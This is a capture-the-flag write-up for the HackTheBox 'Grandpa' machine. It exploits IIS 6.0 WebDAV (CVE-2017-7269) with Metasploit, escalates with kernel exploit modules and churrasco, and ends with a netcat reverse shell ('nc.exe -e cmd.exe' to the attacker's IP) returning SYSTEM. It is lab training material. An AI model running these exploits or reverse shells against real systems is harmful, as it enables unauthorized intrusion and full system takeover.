Unfortunately, I can’t find anything in /images and it doesn’t list contents, and I just get a 403 from /_private.
Nikto:
┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.14:80
+ /: Retrieved x-powered-by header: ASP.NET.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: WebDAV enabled (PROPPATCH UNLOCK LOCK PROPFIND MKCOL COPY SEARCH listed as allowed).
WebDAV:
┌──(kali💀kali)-[~]
└─$ davtest --url http://10.10.10.14/
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.14
********************************************************
NOTE Random string for this session: PNkA0RdNh4VDSDi
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT cfm FAIL
PUT pl FAIL
PUT jsp FAIL
PUT txt FAIL
PUT asp FAIL
PUT php FAIL
PUT jhtml FAIL
PUT html FAIL
PUT aspx FAIL
PUT shtml FAIL
PUT cgi FAIL
This reminds me a lot of Granny, and given all the WebDAV in the nmap output, I randavtest. Unlike in Granny, nothing is enabled:
Vulnerabilities:
Since IIS 6.0 is so old, I decided to look for vulnerabilities, and found some:
┌──(kali💀kali)-[~]
└─$ searchsploit iis 6.0
Exploit Title | Path
------------------------------------------------------------ ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Ne | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote St | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Servic | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (De | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Bu | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Pa | windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
Microsoft IIS 6.0 is vulnerable to a remote buffer overflow.
Note: Several people I know have tried to solve this box without using Metasploit and have failed to because the shell you get back is too unstable. Therefore, I’ll be solving this box using Metasploit.
Foothold: Metasploit
Start up Metasploit.
┌──(kali💀kali)-[~]
└─$ msfconsole
Viewing the exploit on exploitdb we get a CVE #2017-7269. Let’s see if Metasploit has an exploit for it.
msf6 > search 2017-7269
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
It does. Let’s switch to that exploit and configure the RHOST to the Grandpa IP address.
msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.2
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
It appears the shell we are in however is a bit wonky:
If we run ps in Meterpreter, we can find list out running processes.
meterpreter > ps
2736 1496 w3wp.exe x86 0 NT AUTHORITY\NETWORK SER c:\windows\system32\inet
Process 1736 seems especially interesting because it is running as NT AUTHORITY\NETWORK SERVICE. We can migrate to that process using the migrate command:
meterpreter > migrate 2736
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
Cool. Now we’ll need to focus on escalating our privileges to get the flags:
meterpreter > cd 'C:\Documents and Settings'
meterpreter > cd 'C:Harry'
Lets go ahead and background this session and import the local_exploit_suggester module to check for privilege escalation vectors for us:
meterpreter > background
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search local_exploit_suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
Nice, the module found quite a few possible vectors.
I’m most interested in trying exploit/windows/local/ms14_070_tcpip_ioctl.
I can search for and use this module and then set the session as well as my lhost IP address:
msf6 post(multi/recon/local_exploit_suggester) > search exploit/windows/local/ms14_070_tcpip_ioctl
msf6 post(multi/recon/local_exploit_suggester) > use 0
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST 10.10.14.2
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions -i 1
Sometimes this script too would fail, if the box wasn’t in a clean start. When doing buffer overflow exploits, it’s a good idea to start from a clean state if possible (ie reset the box).
Interestingly, I didn’t have access to user.txt at this point. There was one user, Harry:
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
C:\>cd Documents and Settings
C:\Documents and Settings>dir
C:\Documents and Settings>cd Harry
cd Harry
Access is denied.
Privilege Escalation
To run any exploits, I’ll need a place I can write on Grandpa. Many of my go-tos failed In the system root, there’s an unusual directory, wmpub:
C:\>cd wmpub
C:\wmpub>echo test > test.txt
C:\wmpub>dir
C:\wmpub>type test.txt
type test.txt
test
icacles shows that as well:
C:\>icacls wmpub
That Userss can WD decodes to write data/add files.
systeminfo:
While you don’t see it in newer HTB, for these original hosts, kernel exploits were often the intended path, and it’s definitely something that will come up in OSCP. To check, I’ll start with a systeminfo:
C:\wmpub>systeminfo
Host Name: GRANPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 2 Hours, 4 Minutes, 47 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2293 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 751 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,288 MB
Page File: In Use: 182 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
I can then drop that into a file and use Windows Exploit Suggester to see what exploits might work.
First, update:
┌──(kali💀kali)-[/opt]
└─$ cd Windows-Exploit-Suggester
┌──(kali💀kali)-[/opt/Windows-Exploit-Suggester]
└─$ sudo ./windows-exploit-suggester.py --update
Now pass it the new database and the systeminfo output:
Going from this list to a shell is often a lot of googling, guessing, and trial and error. I’ll reduce the list with the following criteria:
Not interested in Metasploit.
Looking (at least to start) for exploits against Windows itself, not IE or MsSQL.
I like to start with ones that I can find a pre-compiled exe. That’s not a great idea for real work, but easiest for HTB / OSCP.
The exe has to create a new process that calls back or can return a shell in the same window. You’ll find a lot of these have exes that open a new shell as SYSTEM, which isn’t useful at all for me.
No Success
I tried a lot off this list, but none with success. This is normal for this kind of thing. It’s frustrating, and normal. One tip I’d throw out for anyone doing OSCP - keep a list of exploits that have binaries that fit the descriptions above and where they work. I used to have one, but can’t find it anymore. Something like this is a really good start.
I went back to enumerating, and checked privs:
C:\>whoami /priv
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SEImpersonalPrivilege is one I know to look out for. For modern boxes, that means a potato exploit (juicy, lonely, rotten). But for 2003, it’s better to start with churrasco.
churrasco:
I grabbed the binary from the Churrasco GitHub. I ran smbserver.py share . on my local machine to open an SMB share named share with both nc.exe and churrasco.exe in that directory:
┌──(kali💀kali)-[~/Desktop]
└─$ smbserver.py share .
C:\wmpub>copy \\10.10.14.2\share\nc.exe .
C:\wmpub>copy \\10.10.14.2\share\churrasco.exe
Now run it, having it run nc to connect back to me:
┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
C:\wmpub>.\churrasco.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.2 443"
┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.14] 1045
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system
